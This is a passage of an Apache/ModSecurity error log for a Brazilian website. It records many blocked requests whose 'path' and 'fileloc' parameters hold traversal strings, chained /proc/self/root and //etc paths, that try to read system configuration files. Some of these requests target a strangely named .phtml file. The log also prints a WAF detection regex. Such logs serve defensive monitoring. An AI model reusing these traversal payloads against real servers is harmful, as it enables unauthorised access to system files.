"ab1ktfHIg5MgXLBnicMroQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:05.615159 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.244.43:40536] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1ktfXLqtnMIWvjpaLULwAAApg"]
[Fri Mar 20 12:16:06.715178 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:50364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ktvXLqtnMIWvjpaLUMQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:10.595366 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.241.31:37554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kul1pVZ5mVmJwsFNlXQAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:13.297791 2026] [mime_magic:error] [pid 15826:tid 140411565680384] (70014)End of file found: [client 57.141.18.51:39748] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:16:15.279470 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.243.128:42654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kv_HIg5MgXLBnicMrtQAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:17.004379 2026] [:error] [pid 21219:tid 140411641214720] [client 57.141.18.23:39930] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1kwfXLqtnMIWvjpaLUNgAAAow"]
[Fri Mar 20 12:16:25.548425 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:35622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kyeoXxyEfFpUF8f-2wQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Fri Mar 20 12:16:33.279477 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:37556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k0RCii7xarUs8iHaiBQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:34.658993 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:56916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k0vXLqtnMIWvjpaLUTAAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:36.008556 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.241.31:56930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k1AF0L0L-SsrnPo6fVQAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:36.059551 2026] [:error] [pid 11642:tid 140411733534464] [client 57.141.18.25:40392] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1k1Lninkcc-iUj5AqS6wAAA4E"]
[Fri Mar 20 12:16:37.323239 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:60354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k1V1pVZ5mVmJwsFNlagAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:40.886814 2026] [:error] [pid 21219:tid 140411582465792] [client 57.141.18.10:40658] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1k2PXLqtnMIWvjpaLUUgAAApM"]
[Fri Mar 20 12:16:47.095251 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:60360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k3wF0L0L-SsrnPo6fYQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:48.811744 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:60360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k4AF0L0L-SsrnPo6fYwAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:16:50.310146 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.87:41270] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1k4hCii7xarUs8iHaiCQAAAhM"]
[Fri Mar 20 12:16:52.291743 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.241.31:54514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k5BCii7xarUs8iHaiDQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:17:00.233142 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:54524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k7AF0L0L-SsrnPo6fawAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:17:05.001394 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:59904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k8fXLqtnMIWvjpaLUaAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:17:06.301458 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:59908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k8vqxLDW4GITHUkQibQAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:17:10.267067 2026] [mime_magic:error] [pid 15826:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:35622] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/debug/usr
[Fri Mar 20 12:17:15.395594 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.241.31:36868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1k-_XLqtnMIWvjpaLUdgAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:17:20.938435 2026] [mime_magic:error] [pid 26799:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:42586] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:17:28.721884 2026] [mime_magic:error] [pid 10189:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:22102] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:17:32.572038 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.37:43250] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lDPqxLDW4GITHUkQiggAAAQo"]
[Fri Mar 20 12:17:58.771152 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.92:44388] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1lJta6ubjKNq_cu4YUnAAAA0Q"]
[Fri Mar 20 12:18:18.393799 2026] [mime_magic:error] [pid 21219:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:45334] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
